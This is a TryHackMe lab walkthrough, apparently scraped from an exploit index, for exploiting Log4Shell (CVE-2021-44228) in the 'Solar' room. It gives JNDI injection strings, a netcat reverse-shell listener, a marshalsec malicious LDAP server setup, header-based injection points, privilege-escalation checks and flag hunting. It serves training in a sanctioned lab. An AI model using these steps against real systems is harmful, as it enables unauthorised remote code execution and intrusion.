Share
## https://sploitus.com/exploit?id=55816361-BC06-5B87-80CD-2FD2E003EB7D
# ๐ฅ Solar Exploiting Log4j - TryHackMe Walkthrough
## ๐ Room: Solar Exploiting Log4j
Platform: TryHackMe
Difficulty: Medium
Topic: Log4Shell (Log4j Vulnerability)
---
## ๐ง Objective
Exploit the Log4j vulnerability (CVE-2021-44228) to gain remote code execution and capture flags.
---
## ๐ ๏ธ Tools Used
* Nmap
* Burp Suite
* cURL
* Netcat
* Python HTTP Server
---
## ๐ Step 1: Reconnaissance
### ๐ Scan Target
```bash
nmap -sC -sV
```
### ๐ Findings
* Open ports: 80 (HTTP), others depending on room
* Web application running Java-based backend
---
## ๐ Step 2: Web Enumeration
* Visit the web app in browser
* Interact with inputs (login/search/header fields)
* Capture request using Burp Suite
---
## ๐ฅ Step 3: Identify Log4j Vulnerability
Log4j vulnerability allows JNDI injection:
```
${jndi:ldap://:1389/a}
```
If input is logged โ vulnerability exists.
---
## โ๏ธ Step 4: Setup Listener
### Start Netcat
```bash
nc -lvnp 4444
```
### Start Malicious LDAP Server (Example)
```bash
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
```
Run LDAP server:
```bash
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://:8000/#Exploit" 1389
```
---
## ๐ก Step 5: Host Payload
```bash
python3 -m http.server 8000
```
Create malicious Java class (Exploit.class)
---
## ๐ Step 6: Trigger Exploit
Inject payload into vulnerable field:
```
${jndi:ldap://:1389/Exploit}
```
๐ก Use headers like:
* User-Agent
* X-Api-Version
---
## ๐ฅ๏ธ Step 7: Gain Reverse Shell
Once triggered:
* Target connects back to Netcat listener
* You get shell access
---
## ๐ Step 8: Privilege Escalation (if required)
Check:
```bash
sudo -l
```
Look for:
* Misconfigured SUID binaries
* Writable files
* Cron jobs
---
## ๐ฉ Step 9: Capture Flags
```bash
find / -name flag.txt 2>/dev/null
cat flag.txt
```
## ๐งพ Key Concepts Learned
* Log4Shell (CVE-2021-44228)
* JNDI Injection
* Remote Code Execution (RCE)
* Reverse Shell
* Web Exploitation